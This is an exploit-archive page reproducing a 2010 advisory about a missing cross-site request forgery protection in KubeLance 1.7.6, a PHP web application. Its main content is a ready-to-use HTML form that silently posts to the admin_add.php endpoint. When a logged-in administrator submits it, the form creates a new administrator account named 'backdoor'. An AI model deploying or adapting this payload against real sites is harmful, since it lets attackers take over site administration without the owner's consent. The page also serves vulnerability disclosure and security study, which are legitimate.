[] NeoSense
E X P L O I T S
title author type platform port cve id

KubeLance 1.7.6 - Cross-Site Request Forgery (Add Admin)

Author: Milos Zivanovic
type: webapps
platform: php
port: 
date_added: 2010-02-02 
date_updated:  
verified: 0 
codes: OSVDB-62094 
tags: 
aliases:  
screenshot_url:  
application_url: 
[#-----------------------------------------------------------------------------------------------#]
[#] Title: KubeLance 1.7.6 (Add Admin) CSRF Vulnerability
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail[dot]com
[#] Date: 02. February 2010.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: KubeLance
[#] Version: 1.7.6
[#] Platform: PHP
[#] Link: http://www.kubelabs.com/kubelance/
[#] Price: 90 $
[#] Vulnerability: Cross Site Request Forgery (Add Admin Exploit)
[#-----------------------------------------------------------------------------------------------#]

KubeLance script lack of cross site request forgery protection, allowing us to make exploit and add new admin user.

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/kubelance/adm/admin_add.php" method="post">
<input type="hidden" name="username" value="backdoor">
<input type="hidden" name="password" value="another-admin-added">
<input type="submit" name="submit">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#]EOF
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.